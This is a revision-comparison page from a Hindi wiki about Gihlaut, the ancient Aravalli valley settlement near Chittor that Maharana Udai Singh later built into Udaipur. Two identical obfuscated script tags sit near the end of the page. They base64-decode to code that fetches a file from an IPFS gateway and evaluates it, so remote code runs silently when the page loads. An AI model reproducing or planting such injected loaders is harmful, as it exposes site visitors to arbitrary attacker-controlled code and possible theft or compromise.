Difference between revisions of "गिहलौट"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(2 intermediate revisions by the same user not shown)
Line 1: Line 1:
*गिहलौट मध्यकाल में [[चित्तौड़]] के निकट [[अरावली पर्वतमाला|अरावली पर्वत]] की घाटी में बसा हुआ एक अति प्राचीन स्थान है, जो बाद में [[उदयपुर]] कहलाया।  
+
'''गिहलौट''' [[मध्यकाल]] में [[चित्तौड़]] के निकट [[अरावली पर्वतमाला|अरावली पर्वत]] की घाटी में बसा हुआ एक अति प्राचीन स्थान है, जो बाद में [[उदयपुर]] कहलाया। यह [[राजपूत|राजपूतों]] का आदि निवास स्थान था।  
*गिहलौट राजपूतों का आदि निवास स्थान था।  
 
 
*इस स्थान का नामकरण गुहिल जाति के यहाँ मूलरूप से निवास करने के कारण हुआ था।  
 
*इस स्थान का नामकरण गुहिल जाति के यहाँ मूलरूप से निवास करने के कारण हुआ था।  
 
*सन 1567 ई. में जब [[अकबर]] ने चित्तौड़ पर आक्रमण किया, तो [[महाराणा उदयसिंह]] राजधानी छोड़कर गिहलौट में जाकर रहे थे।  
 
*सन 1567 ई. में जब [[अकबर]] ने चित्तौड़ पर आक्रमण किया, तो [[महाराणा उदयसिंह]] राजधानी छोड़कर गिहलौट में जाकर रहे थे।  
Line 8: Line 7:
 
*इसी का नाम कुछ समय पश्चात् [[मेवाड़]] के नाम पर उदयपुर हुआ और उदयसिंह ने राज्य की राजधानी चित्तौड़ से हटा कर इस नये नगर में बनायी गयी।  
 
*इसी का नाम कुछ समय पश्चात् [[मेवाड़]] के नाम पर उदयपुर हुआ और उदयसिंह ने राज्य की राजधानी चित्तौड़ से हटा कर इस नये नगर में बनायी गयी।  
  
 
{{प्रचार}}
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=प्रारम्भिक1
 
|आधार=प्रारम्भिक1
Line 20: Line 17:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
[[Category:नया पन्ना]]
+
==संबंधित लेख==
 +
{{राजस्थान के ऐतिहासिक स्थान}}
 +
[[Category:राजस्थान]]
 +
[[Category:राजस्थान_के_ऐतिहासिक_स्थान]]
 +
[[Category:ऐतिहासिक_स्थान_कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 06:57, 8 August 2012

gihalaut madhyakal mean chittau d ke nikat aravali parvat ki ghati mean basa hua ek ati prachin sthan hai, jo bad mean udayapur kahalaya. yah rajapootoan ka adi nivas sthan tha.

  • is sthan ka namakaran guhil jati ke yahaan moolaroop se nivas karane ke karan hua tha.
  • san 1567 ee. mean jab akabar ne chittau d par akraman kiya, to maharana udayasianh rajadhani chho dakar gihalaut mean jakar rahe the.
  • unhoanne prarambh mean yahaan ek paha di par sundar prasad ka nirman karavaya tha.
  • dhire-dhire yahaan kee mahal banavaye tatha yahaan par nivasiyoan ki sankhya bhi badhane lagi.
  • jaldi hi is jangali gaanv ne ek sundar nagar ka pahanava pahan liya.
  • isi ka nam kuchh samay pashchath meva d ke nam par udayapur hua aur udayasianh ne rajy ki rajadhani chittau d se hata kar is naye nagar mean banayi gayi.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh